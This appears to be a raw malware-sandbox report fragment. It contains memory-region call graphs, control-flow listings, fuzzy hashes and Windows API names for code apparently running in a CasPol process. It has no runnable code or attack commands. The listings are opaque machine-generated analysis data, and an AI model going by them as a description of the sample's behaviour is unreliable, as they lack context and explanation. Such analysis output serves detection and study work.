47751->47749 47752->47749 47753->47749 47755 5eeae82 47754->47755 47762 5eeaed7 47754->47762 47798 5ee8ac0 47755->47798 47757 5eeaefb 47757->47735 47758 5eeae96 47758->47735 47759 5eeaf5e GlobalMemoryStatusEx 47761 5eeaf8e 47759->47761 47761->47735 47762->47757 47762->47759 47763 5eeaedc GlobalMemoryStatusEx 47763->47762 47765 5eeae3c 3 API calls 47764->47765 47767 5eeae37 47765->47767 47766 5eeae4d 47766->47735 47767->47766 47768 5ee8ac0 GlobalMemoryStatusEx 47767->47768 47770 5eeae92 47768->47770 47769 5eeae96 47769->47735 47770->47769 47771 5eeaedc 2 API calls 47770->47771 47773 5eeaed7 47770->47773 47771->47773 47772 5eeaefb 47772->47735 47773->47772 47774 5eeaf5e GlobalMemoryStatusEx 47773->47774 47775 5eeaf8e 47774->47775 47775->47735 47777 5eeae4d 47776->47777 47778 5eeae75 47776->47778 47777->47735 47779 5ee8ac0 GlobalMemoryStatusEx 47778->47779 47781 5eeae92 47779->47781 47780 5eeae96 47780->47735 47781->47780 47782 5eeaedc 2 API calls 47781->47782 47784 5eeaed7 47781->47784 47782->47784 47783 5eeaefb 47783->47735 47784->47783 47785 5eeaf5e GlobalMemoryStatusEx 47784->47785 47786 5eeaf8e 47785->47786 47786->47735 47788 5eeae4d 47787->47788 47789 5eeae75 47787->47789 47788->47735 47790 5ee8ac0 GlobalMemoryStatusEx 47789->47790 47792 5eeae92 47790->47792 47791 5eeae96 47791->47735 47792->47791 47793 5eeaedc 2 API calls 47792->47793 47795 5eeaed7 47792->47795 47793->47795 47794 5eeaefb 47794->47735 47795->47794 47796 5eeaf5e GlobalMemoryStatusEx 47795->47796 47797 5eeaf8e 47796->47797 47797->47735 47799 5eeaf18 GlobalMemoryStatusEx 47798->47799 47801 5eeae92 47799->47801 47801->47758 47801->47762 47801->47763 47429 5eebd40 47430 5eebd53 47429->47430 47433 5ee8b08 47430->47433 47432 5eebd5e 47434 5ee8b13 47433->47434 47435 5eec1ca 47434->47435 47439 5eec1dc 47434->47439 47450 5eec1d0 47434->47450 47462 5eec1e0 47434->47462 47435->47432 47441 5eec202 47439->47441 47440 5eec30b 47440->47435 47441->47440 47473 5eec900 47441->47473 47442 5eec478 47443 5eebf2c GetModuleHandleW 47442->47443 47444 5eec4a1 47442->47444 47445 5eec4cb 47443->47445 47444->47444 47446 5eedd3c CreateWindowExW 47445->47446 47447 5eedd1c CreateWindowExW 47445->47447 47448 5eedd40 CreateWindowExW 47445->47448 47446->47444 47447->47444 47448->47444 47451 5eec1dc 2 API calls 47450->47451 47453 5eec1d7 47451->47453 47452 5eec30b 47452->47435 47453->47452 47461 5eec900 GetModuleHandleW 47453->47461 47454 5eec478 47455 5eebf2c GetModuleHandleW 47454->47455 47457 5eec4a1 47454->47457 47456 5eec4cb 47455->47456 47487 5eedd1c 47456->47487 47492 5eedd3c 47456->47492 47495 5eedd40 47456->47495 47461->47454 47464 5eec202 47462->47464 47463 5eec30b 47463->47435 47464->47463 47472 5eec900 GetModuleHandleW 47464->47472 47465 5eec478 47466 5eebf2c GetModuleHandleW 47465->47466 47468 5eec4a1 47465->47468 47467 5eec4cb 47466->47467 47469 5eedd3c CreateWindowExW 47467->47469 47470 5eedd1c CreateWindowExW 47467->47470 47471 5eedd40 CreateWindowExW 47467->47471 47469->47468 47470->47468 47471->47468 47472->47465 47474 5eec92d 47473->47474 47475 5eec9ae 47474->47475 47477 5eeca70 47474->47477 47478 5eeca85 47477->47478 47479 5eebf2c GetModuleHandleW 47478->47479 47480 5eecaa9 47478->47480 47479->47480 47481 5eebf2c GetModuleHandleW 47480->47481 47486 5eecc74 47480->47486 47482 5eecbfa 47481->47482 47483 5eebf2c GetModuleHandleW 47482->47483 47482->47486 47484 5eecc48 47483->47484 47485 5eebf2c GetModuleHandleW 47484->47485 47484->47486 47485->47486 47486->47475 47488 5eedd3c CreateWindowExW 47487->47488 47489 5eedd37 47488->47489 47490 5eedd75 47489->47490 47498 5eec004 47489->47498 47490->47457 47493 5eedd75 47492->47493 47494 5eec004 CreateWindowExW 47492->47494 47493->47457 47494->47493 47496 5eec004 CreateWindowExW 47495->47496 47497 5eedd75 47496->47497 47497->47457 47499 5eedd90 CreateWindowExW 47498->47499 47501 5eedeb4 47499->47501 47506 5eef640 47507 5eef6a6 47506->47507 47511 5eef7f0 47507->47511 47515 5eef800 47507->47515 47508 5eef755 47512 5eef800 47511->47512 47518 5eef1fc 47512->47518 47516 5eef1fc DuplicateHandle 47515->47516 47517 5eef82e 47516->47517 47517->47508 47519 5eef868 DuplicateHandle 47518->47519 47520 5eef82e 47519->47520 47520->47508 47353 23f4d30 47354 23f4d44 47353->47354 47357 23f5382 47354->47357 47363 23f5468 47357->47363 47368 23f557e 47357->47368 47373 23f5564 47357->47373 47378 23f5457 47357->47378 47364 23f54ac 47363->47364 47365 23f55a3 47364->47365 47383 23f5870 47364->47383 47388 23f5860 47364->47388 47369 23f5591 47368->47369 47370 23f55a3 47368->47370 47371 23f5870 2 API calls 47369->47371 47372 23f5860 2 API calls 47369->47372 47371->47370 47372->47370 47374 23f5517 47373->47374 47375 23f55a3 47374->47375 47376 23f5870 2 API calls 47374->47376 47377 23f5860 2 API calls 47374->47377 47376->47375 47377->47375 47379 23f5468 47378->47379 47380 23f55a3 47379->47380 47381 23f5870 2 API calls 47379->47381 47382 23f5860 2 API calls 47379->47382 47381->47380 47382->47380 47384 23f587e 47383->47384 47393 23f58af 47384->47393 47397 23f58c0 47384->47397 47385 23f588e 47385->47365 47389 23f5870 47388->47389 47391 23f58af RtlEncodePointer 47389->47391 47392 23f58c0 RtlEncodePointer 47389->47392 47390 23f588e 47390->47365 47391->47390 47392->47390 47394 23f58c0 47393->47394 47395 23f5924 RtlEncodePointer 47394->47395 47396 23f594d 47394->47396 47395->47396 47396->47385 47398 23f58fa 47397->47398 47399 23f5924 RtlEncodePointer 47398->47399 47400 23f594d 47398->47400 47399->47400 47400->47385 47412 5dfe440 47416 5dfe441 47412->47416 47413 5dfe6c9 47415 5df7fe8 RegQueryValueExW 47415->47416 47416->47413 47416->47415 47417 5df7fdc 47416->47417 47418 5dfe758 RegOpenKeyExW 47417->47418 47420 5dfe81e 47418->47420 47420->47420 47521 5df7bf0 47522 5df7bf1 LdrInitializeThunk 47521->47522 47524 5df7c62 47522->47524

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 5ee8b28-5ee8b41 1 5ee8bfc-5ee8c0c 0->1 2 5ee8b47-5ee8b5b 0->2 119 5ee8c0e call 5ee8dcc 1->119 120 5ee8c0e call 5ee8b28 1->120 5 5ee8b5d-5ee8b5f 2->5 6 5ee8b61 2->6 8 5ee8b64-5ee8b79 5->8 6->8 7 5ee8c14-5ee8c1b 10 5ee8b7b-5ee8b8a 8->10 11 5ee8bc0-5ee8be9 call 5ee87b4 8->11 17 5ee8c1c 10->17 18 5ee8b90-5ee8b93 10->18 15 5ee8beb-5ee8bf2 11->15 16 5ee8bf4-5ee8bfa 11->16 15->7 16->7 20 5ee8c21-5ee8c5b 17->20 19 5ee8b99-5ee8b9f 18->19 18->20 19->11 21 5ee8ba1-5ee8bbe 19->21 25 5ee8c9d-5ee8c9f 20->25 26 5ee8c5d-5ee8c62 20->26 21->11 29 5ee8ca9-5ee8cbd 25->29 30 5ee8ca1-5ee8ca7 25->30 27 5ee8c68-5ee8c6b 26->27 28 5ee8e83 26->28 33 5ee8e88-5ee8ed0 27->33 34 5ee8c71-5ee8c77 27->34 28->33 46 5ee8cbf-5ee8cc3 29->46 47 5ee8cd8 29->47 31 5ee8cde-5ee8ce0 30->31 37 5ee8ce9-5ee8cf2 31->37 38 5ee8ce2-5ee8ce7 31->38 58 5ee8ed6 33->58 59 5ee8ed2-5ee8ed4 33->59 34->25 36 5ee8c79-5ee8c98 34->36 60 5ee8dad-5ee8dc1 36->60 49 5ee8cf4-5ee8cfd 37->49 50 5ee8d02-5ee8d14 37->50 38->37 40 5ee8d4c-5ee8d4f 38->40 40->28 43 5ee8d55-5ee8d58 40->43 43->33 48 5ee8d5e-5ee8d64 43->48 46->47 52 5ee8cc5-5ee8cd6 46->52 47->31 54 5ee8d66-5ee8d83 48->54 55 5ee8d85-5ee8d96 48->55 49->55 50->28 62 5ee8d1a-5ee8d1d 50->62 52->31 52->47 54->55 55->60 67 5ee8d98-5ee8da7 55->67 65 5ee8ed9-5ee8f29 58->65 59->65 76 5ee8dc8-5ee8e5f 60->76 62->33 66 5ee8d23-5ee8d29 62->66 77 5ee8f2f-5ee9036 65->77 78 5ee903c-5ee9051 65->78 66->55 70 5ee8d2b-5ee8d4a 66->70 67->60 70->55 90 5ee8e67-5ee8e6d 76->90 91 5ee8e61-5ee8e65 76->91 77->78 84 5ee9052 78->84 84->84 93 5ee8e77-5ee8e80 90->93 91->90 92 5ee8e6f-5ee8e75 91->92 92->93 119->7 120->7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \$\$\$\
                                                                • API String ID: 0-3238275731
                                                                • Opcode ID: ea4eaf8d5eaa67f51ec56164808f4716f853bc71942a2ff6f764e4f5d8f76b08
                                                                • Instruction ID: 46b3e83b5f4d0803d9b9db1084fedc9fb6e2b329e15297bc83c78cee3145b05e
                                                                • Opcode Fuzzy Hash: ea4eaf8d5eaa67f51ec56164808f4716f853bc71942a2ff6f764e4f5d8f76b08
                                                                • Instruction Fuzzy Hash: 2ED10471B142148BDB18EBB898507BE77E3AFC8318F149929D50AEB384EF74DC468791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D0)l$\$l
                                                                • API String ID: 0-464691938
                                                                • Opcode ID: 0e3e14981b5db4cf75b363029d557b5b8ec633ca82e9a794ae406dcdb94a481d
                                                                • Instruction ID: 103b871e9a673d460ad5761cbf1362b1e914d52774282492a6b6c70662a0de40
                                                                • Opcode Fuzzy Hash: 0e3e14981b5db4cf75b363029d557b5b8ec633ca82e9a794ae406dcdb94a481d
                                                                • Instruction Fuzzy Hash: BC421730F101149FEB28DB68C855BBEB6E3AF89314F158869E54AEF3C1DA74EC418791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bd4d0311f9b4946f8144a7821a502daf8294e1f01ce8b4a3339cca31352415f
                                                                • Instruction ID: a365ba0c20bef516d886d452a3d13dc92af95261842715b53aa95ac703bac15a
                                                                • Opcode Fuzzy Hash: 6bd4d0311f9b4946f8144a7821a502daf8294e1f01ce8b4a3339cca31352415f
                                                                • Instruction Fuzzy Hash: 10530D70D14B598EDB15EF68C844AE9F7B1FF9A304F51D69AE04867221EB30AAC4CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8^)l
                                                                • API String ID: 0-1924906608
                                                                • Opcode ID: a0396a7a2b46bce1918de26b0859d9838fba92c2da332614e902c49cbab5c1f7
                                                                • Instruction ID: 5a02eed19ba0b06a0dd01b463abcf49db2a216cfaf25b032758859ea9dd86af1
                                                                • Opcode Fuzzy Hash: a0396a7a2b46bce1918de26b0859d9838fba92c2da332614e902c49cbab5c1f7
                                                                • Instruction Fuzzy Hash: 5192A430B142188FEB24DB68C498BADB7A2FF85318F14916AD446EF391DBB4DD41CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \$l
                                                                • API String ID: 0-1567737467
                                                                • Opcode ID: 2512f852c615a736224ba9890573e5f1bc7a50c063d3b8de389763619cbba2da
                                                                • Instruction ID: 524438a82815119fcf0a9ac366450810bcf5787ec6bc784f12e2da71d16b5c06
                                                                • Opcode Fuzzy Hash: 2512f852c615a736224ba9890573e5f1bc7a50c063d3b8de389763619cbba2da
                                                                • Instruction Fuzzy Hash: 1832A270B142089FEB24DB68C884BAEB7F3EF89314F158969E185DB391DB34EC458B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \$l
                                                                • API String ID: 0-1567737467
                                                                • Opcode ID: bb9d50e806c640671bf76b545ff7d3a2510c595f889b2f7fa1335e9640059759
                                                                • Instruction ID: ed5d832dc281fb739116437d7bda5a93e1b5b3c5366719dd102984a016f69b12
                                                                • Opcode Fuzzy Hash: bb9d50e806c640671bf76b545ff7d3a2510c595f889b2f7fa1335e9640059759
                                                                • Instruction Fuzzy Hash: EFE19070F101089FEB14DB68C454BAEB7F3AB89318F158869E549EF391CB75EC818B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2166 5df7bf0-5df7c5c LdrInitializeThunk 2175 5df7da5-5df7dc2 call 5df6758 call 5df68e8 2166->2175 2176 5df7c62-5df7c7c 2166->2176 2190 5df7dc7-5df7dd0 2175->2190 2176->2175 2180 5df7c82-5df7c9c 2176->2180 2184 5df7c9e-5df7ca0 2180->2184 2185 5df7ca2 2180->2185 2187 5df7ca5-5df7d00 2184->2187 2185->2187 2196 5df7d06 2187->2196 2197 5df7d02-5df7d04 2187->2197 2198 5df7d09-5df7da3 2196->2198 2197->2198 2198->2190
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 442e7ee3a37fe040f4296ab533129d2706d8cb8a077733d5915b91fbfa35fc22
                                                                • Instruction ID: a30964706968541f1b804d9b5e23c06b6684065bb345279fa00617471dd08e1c
                                                                • Opcode Fuzzy Hash: 442e7ee3a37fe040f4296ab533129d2706d8cb8a077733d5915b91fbfa35fc22
                                                                • Instruction Fuzzy Hash: AA519670A00209DBDB04EFB4D848AEEB7A6FF88304F15896AD516DB391EF34E9058B50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \$l
                                                                • API String ID: 0-1567737467
                                                                • Opcode ID: 2f36e67ebcb8bd136c58885e493bc362ce16f2aca7f8d55d35d577f3f9f8285d
                                                                • Instruction ID: e1ab7b99571c849c67feb5b219771cf5484f7f38f01fc7abed23e772b46cfea3
                                                                • Opcode Fuzzy Hash: 2f36e67ebcb8bd136c58885e493bc362ce16f2aca7f8d55d35d577f3f9f8285d
                                                                • Instruction Fuzzy Hash: E2D17F70F101089FEB14DB68C458BAEB6F3AB89314F15C869E449EF391CB75ED818B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: $%%l
                                                                • API String ID: 4139908857-2623905514
                                                                • Opcode ID: e4a4c4e5e941254a51d66c4fa0eadcc8386d3a94bdac40511ae7cbf8147c4a9b
                                                                • Instruction ID: 63c8bc28fd44d28bd4d8871865b5e423179b1f61180e665a0b9777bf9a482496
                                                                • Opcode Fuzzy Hash: e4a4c4e5e941254a51d66c4fa0eadcc8386d3a94bdac40511ae7cbf8147c4a9b
                                                                • Instruction Fuzzy Hash: E7D14B74A002198FCB05EFA4E454AEEBBB2FF89304F118569D506AB394DB389D46CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64874ee037323a2215186d47ae3bfcbd963e1eb5793165fb620b98268755e7ed
                                                                • Instruction ID: 53d603e2d76190eea97e88971f3f373627bd2d1b1e2f33a69b4d6b67ecc53c4b
                                                                • Opcode Fuzzy Hash: 64874ee037323a2215186d47ae3bfcbd963e1eb5793165fb620b98268755e7ed
                                                                • Instruction Fuzzy Hash: B8829D34A002089FEF28DBA8C4447AEB7B2FF89308F218969D545DB395DB35DC468B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37bcf029a7e1bdd5a261128851783f79df8338032dd53b0173f8ee4af53c8cee
                                                                • Instruction ID: 9457d35ea83e2d3abca018d7d12ef06b1b58a59b7009f2e7a90a4c9e80b851a2
                                                                • Opcode Fuzzy Hash: 37bcf029a7e1bdd5a261128851783f79df8338032dd53b0173f8ee4af53c8cee
                                                                • Instruction Fuzzy Hash: FD42F330F142148FDB14EBB8D894AAEBBB2EF85318F14816AD54AEB391DB34DC45C791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc0746158d23a145afa24640652cd835b3e4e77251ea62102ccca65b28372bd8
                                                                • Instruction ID: f0c758f657d6de6ca1fe1680134e7d449262f881cd625798f5f4554653142a43
                                                                • Opcode Fuzzy Hash: cc0746158d23a145afa24640652cd835b3e4e77251ea62102ccca65b28372bd8
                                                                • Instruction Fuzzy Hash: 8A620831E046188FCB24EF78C85469EB7F2AF89304F1185AAD54AAB750EF309E95CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64451b1923a6d77ac445ae1045f30dc541315e3caa33132c868d65fd4ef2162d
                                                                • Instruction ID: dfb3af8f17f9774b61057b9913fde3dd3a3cc6d27389af5a966227a0635c899b
                                                                • Opcode Fuzzy Hash: 64451b1923a6d77ac445ae1045f30dc541315e3caa33132c868d65fd4ef2162d
                                                                • Instruction Fuzzy Hash: 44F18170B002189FDB18DFA8C894BAEB7F7AF89314F158469E545EB391DB34EC418B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e82e082cd47a74c3432e39967f21ed44e90a9ce5cf2aa07ab010e10b23c7543
                                                                • Instruction ID: 3cf0d4e2b3a8b960be3c500a4475750c8c6481d3de2dcef34d77c04cd892a7d8
                                                                • Opcode Fuzzy Hash: 4e82e082cd47a74c3432e39967f21ed44e90a9ce5cf2aa07ab010e10b23c7543
                                                                • Instruction Fuzzy Hash: B4F1C634B042186FEF28DBA8C854BBE77A7FB89308F155476E645DB382DB24DC418752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4a3b37f0c7d14eec6ee31746c38024d1d8b1b0181b91ccc3d0c9e21189b3841
                                                                • Instruction ID: 1be3435b86f7419c9d54c3b5b8da77c5c83ed1dc50240b53c30fb96c879824f0
                                                                • Opcode Fuzzy Hash: a4a3b37f0c7d14eec6ee31746c38024d1d8b1b0181b91ccc3d0c9e21189b3841
                                                                • Instruction Fuzzy Hash: C2E1B530B402099FDB18EBB8D858BAE77E3AF85714F16846AE605DB391DF34DC058B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e18516806eabcae73758853012979138f5a01213d1a6537967d70b4d89a1e420
                                                                • Instruction ID: d27924f00f9c689daf6e505501b41f6107106f12b8a6747da6891f65a77cd076
                                                                • Opcode Fuzzy Hash: e18516806eabcae73758853012979138f5a01213d1a6537967d70b4d89a1e420
                                                                • Instruction Fuzzy Hash: 13F19D31F002159BDB18DFB8C848BADB7B2AFC8314F559665D849EB395DB34EC428B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 171e73cfd4479856da85edd77000131d89e3f15093f645bc504b7d4d56d1040d
                                                                • Instruction ID: 8edbd057bdaab96920860ee4286827af1b4e1bfa65764876e9941a990ad8abbf
                                                                • Opcode Fuzzy Hash: 171e73cfd4479856da85edd77000131d89e3f15093f645bc504b7d4d56d1040d
                                                                • Instruction Fuzzy Hash: 02D1C030F002189FD728EB78C85976E76E3AFC4714F158479E61AAB380DF749D428B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 27c9e8fb4d729d8e8188c90a3d0b6732ec2a592a563bae3e63e1da08d458f4e6
                                                                • Instruction ID: 0efb886b1179da9a8d020614c1de7a77edd031adb04b48d6870f5a0ced8a09e6
                                                                • Opcode Fuzzy Hash: 27c9e8fb4d729d8e8188c90a3d0b6732ec2a592a563bae3e63e1da08d458f4e6
                                                                • Instruction Fuzzy Hash: E1C1C474F041186FEF28DBA8C494BBE77A7FB89318F105865E645DB381CA38DC818792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14777ea7b4456b2dba84af3b49e2ee7eb72c18ddb0b4972f6c34c1cbee730a23
                                                                • Instruction ID: 160a55cb1b9f66caa18fe4c7650e82291c918ff0f6bd978072622a230e5bb67d
                                                                • Opcode Fuzzy Hash: 14777ea7b4456b2dba84af3b49e2ee7eb72c18ddb0b4972f6c34c1cbee730a23
                                                                • Instruction Fuzzy Hash: B712C3F1DD17468BE318CF65E9882C93BB1B7C43A8BD04A09D2612BAD4D7B8116ACF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a6854f0e4f1de6132bea8b8937a77ebdc972a7b434ab5a1c00d5fc48f18e0c5
                                                                • Instruction ID: ea53c96cacdfce09e5c1fab9637da178ae34d695410ba24d88135e2273f80a86
                                                                • Opcode Fuzzy Hash: 6a6854f0e4f1de6132bea8b8937a77ebdc972a7b434ab5a1c00d5fc48f18e0c5
                                                                • Instruction Fuzzy Hash: 4F918D71E002098FDF50CFA8D9847DEBBF2AF88718F148129E919E7694EB749845CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 859a6521edcccdfcdc9092bd0a89748b035ef385d7340ef6ae390922003a54a9
                                                                • Instruction ID: a5e8dc8613e02ab7637eb226597a7527af60e0719d08b97d55bdc5d94f9bdc4a
                                                                • Opcode Fuzzy Hash: 859a6521edcccdfcdc9092bd0a89748b035ef385d7340ef6ae390922003a54a9
                                                                • Instruction Fuzzy Hash: 2D917D34E10319CFDB04DBA0D854ADDBBBAFF89314F149225E416AB3A0EB74A949CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
